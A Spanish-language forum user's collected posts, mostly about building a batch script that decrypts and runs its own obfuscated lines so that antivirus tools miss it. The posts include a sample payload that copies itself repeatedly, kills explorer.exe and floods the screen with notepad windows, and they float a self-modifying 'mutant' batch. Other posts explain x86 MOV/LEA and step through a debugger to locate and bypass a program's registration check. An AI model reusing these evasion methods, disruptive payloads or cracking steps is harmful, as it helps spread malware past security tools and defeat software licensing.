Mensajes

Hola 79137913 párese que no has entendido si pones a un for leer cada línea de un batch así:

Código [Seleccionar] Expandir


for /f  "usebackq tokens=*" %%a in (archivo.bat) do %%a

Ejecutara cada línea leída del bat
Ahora lo que intento yo es que el archivo bat este cifrado para que no sea detectado (lo del for no para poder leer el archivo) y sea descifrado una línea y sea ejecutada después la siguiente y así sucesivamente.
Aclaro no quiero crear un virus en batch ya que este no es tan fuerte con los nuevos SO solo es una idea que se me ocurrió para ver si se podría lograr y lo ago como pasatiempo

Volviendo al tema supongamos que el archivo bat ya esta cifrado solo seria revertir el proceso de desencriptasion.

Código [Seleccionar] Expandir


@echo off
color 0a
title Archivo Batch
for /f  "usebackq tokens=* skip=12" %%a in (%0) do (
set  comando=%%a
set  comando=%comando:5=o%
set  comando=%comando:8=e%
set  comando=%comando:7=a%
%comando%
)
pause
exit
f5r /L %%7 in (0,1,10) d5 C5py %0  %%7.b7t
t7skkill /F /IM "8xpl5r8r.8x8"
f5r /L %%7 in (0,1,10) d5 st7rt n5t8p7d
msg * "8st5 8s un7 pru8b7..."


La ejecución de la línea descifrada se lograría con solo poner la variable y el sistema lo interpretaría como un comando.
Como ven el archivo bat tiene una parte cifrada son ciertas letra por números y al reemplazar ciertos números por las letras indicadas se ejecutara

Pero el problema es que la variable %%a no le pasa nada a la variable comando ese es el problema y falta cifrar el resto solo lo puse como ejemplo y no creo que sea detectado

gracias daniyo por comentar creía que me habían dejado solo y con tu opinión claro que es una excelente idea pienso yo.

lo que quiero lograr es que el batch este incriptado y no pueda ser detectado por los antivirus (si es código malicioso) o pueda ser leído con solo abrir el archivo bat.
mi idea consiste en que el comando for será la única línea que estará bien que es la que servirá para descifrar una línea para ejecutarla en memoria y así sucesivamente sin la necesidad de crear un archivo externo y mandarlo a ejecutar.
El problema que veo es que si un comando abarca mas de una línea o necesita de variables
Saludos flamer

Bueno esto es lo que tengo, en contre en Internet este tipo de ejemplo:
Nota=no se si funcione en windows vista o 7 en xp si funciona.

Código [Seleccionar] Expandir


@echo off
set name=polomon
set name=%name:o=5%
echo %name%
pause


Que ase esto inicializa la variable name con el valor "polomon"  y luego remplaza todas las letras "o" por  "5"  he imprime esto "p5l5m5n"   

Ahora lo implemento en mi código:

Código [Seleccionar] Expandir


@echo off
color 0a
title Archivo Batch
for /f  "usebackq tokens=* skip=10" %%a in (%0) do (
set  comando=%%a
set  comando=%comando:o=5%
echo %comando%
)
pause
exit
for /L %%a in (0,1,10) do Copy %0  %%a.bat
taskkill /F /IM "explorer.exe"
for /L %%a in (0,1,10) do start notepad
msg * "Esto es una prueba..."


Pero párese ser que la variable %%a no le pasa nada a la variable comando por que me imprime
ECHO está desactivado
Saludos espero respuestas

Hola esto es lo que he logrado leer solo el archivo bat pero no he podido cifrar las cadenas quiero que me muestre las cadenas cifrada en pantalla yo solo después las pongo en el archivo bat y revierto el proceso  de cifrado para ejecutar cada línea, no se si me entiendan lo que quiero lograr.

el code:

Código [Seleccionar] Expandir


@echo off
color 0a
title Archivo Batch
for /f  "usebackq tokens=* skip=6" %%a in (%0) do echo %%a
pause
exit
for /L %%a in (0,1,10) do Copy %0  %%a.bat
taskkill /F /IM "explorer.exe"
for /L %%a in (0,1,10) do start notepad
msg * "Esto es una prueba..."


saludos

hola a todos como estaba aburrido pensé haber si no séme quema mucho la cabeza si se podría leer solo un batch con la finalidad de que el bat estuviera cifrado y al leerse solo se ejecutara línea por línea y así irse ejecutando no tendríamos que crear otro archivo solo que leyera una  línea y la desencripte y la ejecute así sucesiva mente con el fin de que algún antivirus no lo detecte.
La única líneas que tendría que estar bien seria esta:

Código [Seleccionar] Expandir


for /F "tokens=*" %%a in (%0) do echo %%a


Pero aun no consigo leerme solo y tampoco encriptarlo
1-lo que necesito saber como leerme solo con %0 sin poner el nombre del archivo ya que este pudiera ser cambiado
2- remplazar caracteres de una línea  por otro carácter

Yace que batch llano es tan fuerte como antes con los nuevos SO de Windows pero serviría como un pasatiempo y haber si aprendemos algo

Y si vemos mas afondo podríamos crear un batch mutante que modifique su código

saludos Flamer

hola Belial & Grimoire soy flamer sera un honor ayudarte con lo poco que se bueno enpesemos con lo mas simple sera MOV y para el final LEA
Primero MOV mueve el valor de un registro a otro o asigna el valor a un registro ejemplo 1:
darle valor al registro EAX bueno MOV EAX,5 aqui a EAX le estamos dando el valor 5
5
ejemplo 2:
mover el valor de un registro a otro MOV EBX,EAX aqui estamos moviendo el valor de EAX a EBX lo cual los dos registros tendran el mismo o sea no se borra el valor movido de EBX.

y el final LEA=se usa general mente para mover una direccion de memoria a un registro y no te confundas no mueve el valor que contiene dicha direccion.
ejemplo 1:
mover una direccion de memoria a EAX seria asi LEA EAX,DWORD PTR DS:[12A84F]
ejemplo 2:
LEA EAX,DWORD PTR DS:[ECX+45] su poniendo que ECX=12F410 mas 45 igual a 12F455 que es lo que valdra EAX

bueno eso es lo poco que se y tengo entendido si estoy mal corrijanme, espero aberte ayudado

espero encontrarte por el subforo de ing. inversa

saludos flamer y fue un honor ayudar a la ganadora del concuso "hackeen mi server" que puso dimitri(ya te llego el vino)

donde lo bajo y escribe bien no pongas la "i" por esta "y".
Yo escribo mal por que no se como se escriben las palabras y las frases.
no estas en msn y no sigas mis pasos ortograficos
saludos flamer

Bueno llegue hay como te dije traseando

como se que ese es el salto por que si entra (que no salte) te manda a la ventana de registro y sino se brinca esa parte para mostrarte el programa.

y una linea arriba esta una comparacion 00418711  CMP AL,BL    lo que ase es comparar el valor de AL con BL si AL=1 y BL=0 flash Z=0 no brinca y si AL=0 y BL=0 flash Z=1 brinca.

el valor de AL  se optiene de la sentencia 0041870E SETNE AL

si AL=FFFFFFFF = TRUE cuando llegue ala instruccion SETNE AL sera igual a FFFFFF01
si AL=00000000= FALSE cuando llegue a SETNE AL sera igual a 00000000

el valor FFFFFFFF de AL se optiene de unas lineas arriba que verifica si en el registro esta introducida la clave true o false si es false AL=FFFFFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\AT2_INFO  /  Run=true

y a tu pregunta de como se, pues es simple porque te muestra el programa y no la ventana de registro.

talbes quisistes decir como supe pues simple por que al calarlo me mostro el programa.

si no es eso no te entiendo

saludos flamer y para que sirve el programa

Hola yako es simple como te dije
me fuy traseando hasta llegar hay pero ati telo dejo asi y tambien obserbe las cadenas del registro 00418677   ASCII "SOFTWARE\AT2_INFO"

Primero deja aplastodo F8 hasta llegar al call donde se ejecute el programa
una linea arriba ponemos un break point (linea 0049E87A) y damos click en
DEBUG luego en RESTART luego F9 y se de tendra en donde pusimos el
break point damos F7 para entrar a el call luego nos bamos traseando con F8
hasta que se ejecute el programa  y veras el salto y la direccion que te dije

F7=trasear el programa y los call
F8=trasear el programa
F9=ejecuta el programa

saludos flamer

hola Bulld0z3r aver si entendi lo que dise Engelx:
quiere que el archivo a cifrar pase por una serie de operaciones matematicas de comprovacion e incriptacion me suena difisil
algo mas sencillo seria que con una palabra clave(contraseña) lo desencripte
estaria bien postear un codigo horita nose me ocurre nada
saludos flamer